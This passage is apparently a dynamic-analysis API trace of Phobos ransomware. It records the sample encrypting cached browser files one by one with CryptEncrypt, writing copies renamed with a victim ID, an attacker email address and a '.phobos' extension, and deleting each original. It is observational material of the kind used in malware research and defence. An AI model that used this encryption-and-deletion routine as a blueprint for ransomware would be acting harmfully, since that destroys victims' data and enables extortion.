returned 1 [0181.081] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.082] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=860) returned 1 [0181.082] CloseHandle (hObject=0x154) returned 1 [0181.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png")) returned 0x2020 [0181.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.083] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.083] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.084] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.084] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.084] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x35c, lpOverlapped=0x0) returned 1 [0181.092] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x360, dwBufLen=0x360 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x360) returned 1 [0181.092] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x360, lpOverlapped=0x0) returned 1 [0181.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.093] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.093] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.093] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.094] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.094] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.094] CloseHandle (hObject=0x154) returned 1 [0181.094] CloseHandle (hObject=0xb8) returned 1 [0181.094] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAkqhIf[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aakqhif[1].png")) returned 1 [0181.095] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.096] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10126) returned 1 [0181.096] CloseHandle (hObject=0xb8) returned 1 [0181.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg")) returned 0x2020 [0181.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.096] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.096] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.097] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.097] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.097] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x278e, lpOverlapped=0x0) returned 1 [0181.112] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2790, dwBufLen=0x2790 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2790) returned 1 [0181.112] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2790, lpOverlapped=0x0) returned 1 [0181.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.113] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.113] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.113] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.114] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.114] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.114] CloseHandle (hObject=0xb8) returned 1 [0181.114] CloseHandle (hObject=0x154) returned 1 [0181.114] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmo09p[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamo09p[1].jpg")) returned 1 [0181.115] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.116] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=410) returned 1 [0181.116] CloseHandle (hObject=0x154) returned 1 [0181.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png")) returned 0x2020 [0181.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.116] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.117] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.118] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.118] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.118] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19a, lpOverlapped=0x0) returned 1 [0181.137] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0181.137] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0181.138] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0181.138] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.138] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.138] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.138] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.138] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.138] CloseHandle (hObject=0x154) returned 1 [0181.139] CloseHandle (hObject=0xb8) returned 1 [0181.139] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAmUyV2[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aamuyv2[1].png")) returned 1 [0181.140] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.141] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=254) returned 1 [0181.141] CloseHandle (hObject=0xb8) returned 1 [0181.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png")) returned 0x2020 [0181.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.141] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.141] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.142] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.142] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfe, lpOverlapped=0x0) returned 1 [0181.151] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0181.151] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0181.152] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0181.152] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.152] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.152] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.152] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.152] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.152] CloseHandle (hObject=0xb8) returned 1 [0181.152] CloseHandle (hObject=0x154) returned 1 [0181.153] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAn7gKR[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aan7gkr[1].png")) returned 1 [0181.154] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.162] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=71733) returned 1 [0181.162] CloseHandle (hObject=0x154) returned 1 [0181.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js")) returned 0x2020 [0181.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.162] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.162] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ast[2].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ast[2].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.163] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.163] ReadFile (in: hFile=0x154, 